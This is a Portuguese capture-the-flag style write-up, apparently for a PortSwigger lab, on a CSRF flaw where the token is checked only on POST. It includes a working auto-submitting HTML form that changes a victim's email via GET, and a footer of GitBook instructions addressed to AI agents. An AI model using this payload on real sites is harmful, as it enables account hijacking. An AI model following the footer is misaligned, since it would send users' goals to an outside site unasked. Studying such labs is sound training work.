> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/pt-br/web/csrf/csrf-token-validation-depends-on-http-method.md).

# CSRF com Validação de Token Baseada no Método HTTP

### CSRF em que a validação do token depende do método da requisição

#### Contexto do laboratório

A funcionalidade de alteração de e-mail é vulnerável a um ataque CSRF. Há uma defesa, mas ela é aplicada apenas a certos tipos de requisições. Objetivo: Hospedar uma página no servidor de exploração que force a vítima a alterar seu endereço de e-mail. / Credenciais fornecidas para testes: `wiener:peter`.

#### Constatação

* Um token CSRF é verificado em **POST** requisições.

<figure><img src="/files/cf0f780d10af6b8c07646b2121b0aea3e07fae61" alt=""><figcaption></figcaption></figure>

* A mesma ação aceita em **GET** \*\*n
* Ponto em questão: `/my-account/change-email`.

<figure><img src="/files/dd163e98624de9a28fe8a70e60ddf32651bea926" alt=""><figcaption></figcaption></figure>

Hospedar no servidor executa uma página que envia automaticamente uma **GET** requisição para o endpoint de alteração de e-mail:

```html
<form class="login-form" name="change-email-form" action="https://0a72007c0337ccb880ed1c9b00fa00d1.web-security-academy.net/my-account/change-email" method="GET">
           <input required="" type="email" name="email" value="Hacked@byjordan.com">
</form>

<script>
   document.forms[0].submit();
</script>
```

A URL a seguir ilustra o bypass (nenhum token é necessário no GET)

```html
/my-account/change-email?email=test%40test.com
```

<figure><img src="/files/cca57c237edc0fcd9f1443e08b37536076795e37" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/pt-br/web/csrf/csrf-token-validation-depends-on-http-method.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
